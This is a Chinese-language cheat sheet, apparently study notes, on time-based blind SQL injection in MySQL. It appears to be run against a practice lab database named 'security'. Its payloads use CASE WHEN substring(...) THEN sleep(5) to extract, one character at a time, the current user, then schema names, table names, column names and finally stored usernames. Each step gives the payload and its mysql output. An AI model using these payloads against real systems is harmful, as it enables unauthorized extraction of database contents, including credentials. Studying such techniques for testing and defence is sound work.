0x00 记忆方式
and case when(substring(表达式 from 1 for 1)=判断条件) then sleep(5) else 0 end;
0x01 基本数据
mysql> select version();
+-----------+
| version() |
+-----------+
| 5.5.53 |
+-----------+
1 row in set (0.27 sec)
mysql> select user();
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> select database();
+------------+
| database() |
+------------+
| security |
+------------+
1 row in set (0.00 sec)
0x02 获取数据长度
mysql> select length(user());
+----------------+
| length(user()) |
+----------------+
| 14 |
+----------------+
1 row in set (0.00 sec)
数据库语句: select * from users where id=1 and case when(length(user())=14) then sleep(5) else 0 end;
mysql> select * from users where id=1 and case when(length(user())=14) then sleep(5) else 0 end;
Empty set (5.01 sec)
0x03 读取数据库版本/当前连接用户/当前连接的数据库
注意: 读取不同的内容
例如:
select substring(user() from 1 for 1) = r
select substring(user() from 2 for 1) = o
数据库语句: select * from users where id=1 and case when(substring(user() from 1 for 1)=’r’) then sleep(5) else 0 end;
mysql> select * from users where id=1 and case when(substring(user() from 1 for 1)='r') then sleep(5) else 0 end;
Empty set (5.01 sec)
猜对时会延时5秒,一旦延时了5S就可以判断为猜对了
0x04 猜库名
注意: OFFSET 0 修改会显示其他库名
例如:
修改为0 就是出1库
修改为1 就是出2库
// 演示数据
mysql> SELECT schema_name FROM information_schema.schemata LIMIT 0,1;
+--------------------+
| schema_name |
+--------------------+
| information_schema |
+--------------------+
1 row in set (0.00 sec)
读取1库库名第一个字: select * from users where id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 1 for 1)=’i’) then sleep(5) else 0 end;
mysql> select * from users where id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 1 for 1)='i') then sleep(5) else 0 end;
Empty set (5.01 sec)
读取1库库名第二个字: select * from users where id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 2 for 1)=’n’) then sleep(5) else 0 end;
mysql> select * from users where id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 2 for 1)='n') then sleep(5) else 0 end;
Empty set (5.00 sec)
0x05 猜表名
注意: table_schema=xxx 修改为其他库会爆出其他库的数据
例如:
table_schema=database() 会获取当前连接的库数据
table_schema=’test’ 会获取test库数据
注意: OFFSET 0 修改会显示其他表名
mysql> SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 4 OFFSET 0;
+------------+
| table_name |
+------------+
| emails |
| referers |
| uagents |
| users |
+------------+
4 rows in set (0.00 sec)
mysql> SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 2 OFFSET 0;
+------------+
| table_name |
+------------+
| emails |
| referers |
+------------+
2 rows in set (0.00 sec)
例如:
修改为0 就是出1表
修改为1 就是出2表
// 演示数据
mysql> SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1;
+------------+
| table_name |
+------------+
| emails |
+------------+
1 row in set (0.00 sec)
数据库语句-读取当前库的第一张表名的第一个字: select * from users where id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 1 for 1)=’e’) then sleep(5) else 0 end;
mysql> select * from users where id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 1 for 1)='e') then sleep(5) else 0 end;
Empty set (5.01 sec)
数据库语句-读取当前库的第一张表名的第二个字: select * from users where id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 2 for 1)=’m’) then sleep(5) else 0 end;
mysql> select * from users where id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 2 for 1)='m') then sleep(5) else 0 end;
Empty set (5.02 sec)
0x06 猜字段
table_schema = “xx” 要爆的数据库名
table_name = “xx” 要爆的表名
OFFSET 0 表示要爆的位置
例如:
表tdb_admin的字段为 id,usernam,password
limit 0 = id
limit 1 = username
limit 2 = password
// 演示数据
mysql> SELECT column_name FROM information_schema.columns where table_schema='security' and table_name='users' limit 0,1;
+-------------+
| column_name |
+-------------+
| id |
+-------------+
1 row in set (0.00 sec)
猜test库 tdb_admin表的第一个字段名第一个字: select * from users where id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema=’security’ and table_name=’users’ LIMIT 1 OFFSET 0) from 1 for 1)=’i’) then sleep(5) else 0 end;
mysql> select * from users where id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema='security' and table_name='users' LIMIT 1 OFFSET 0) from 1 for 1)='i') then sleep(5) else 0 end;
Empty set (5.01 sec)
猜security库users表的第一个字段名第二个字: select * from users where id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema=’security’ and table_name=’users’ LIMIT 1 OFFSET 0) from 2 for 1)=’d’) then sleep(5) else 0 end;
mysql> select * from users where id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema='security' and table_name='users' LIMIT 1 OFFSET 0) from 2 for 1)='d') then sleep(5) else 0 end;
Empty set (5.00 sec)
0x07 猜内容
OFFSET 0 第几条数据 下标从0开始
from 1 第几个字
// 演示数据
mysql> SELECT * FROM users LIMIT 1 OFFSET 0;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
读取某库某表某字段第一个字: select * from users where id=1 and case when(substring((SELECT 字段名 FROM 库名.表名 LIMIT 1 OFFSET 0) from 1 for 1)=’a’) then sleep(5) else 0 end;
mysql> select * from users where id=1 and case when(substring((SELECT username FROM security.users LIMIT 1 OFFSET 0) from 1 for 1)='D') then sleep(5) else 0 end;
Empty set (5.00 sec)
读取某库某表某字段第二个字: select * from users where id=1 and case when(substring((SELECT username FROM security.users LIMIT 1 OFFSET 0) from 2 for 1)=’u’) then sleep(5) else 0 end;
mysql> select * from users where id=1 and case when(substring((SELECT username FROM security.users LIMIT 1 OFFSET 0) from 2 for 1)='u') then sleep(5) else 0 end;
Empty set (5.01 sec)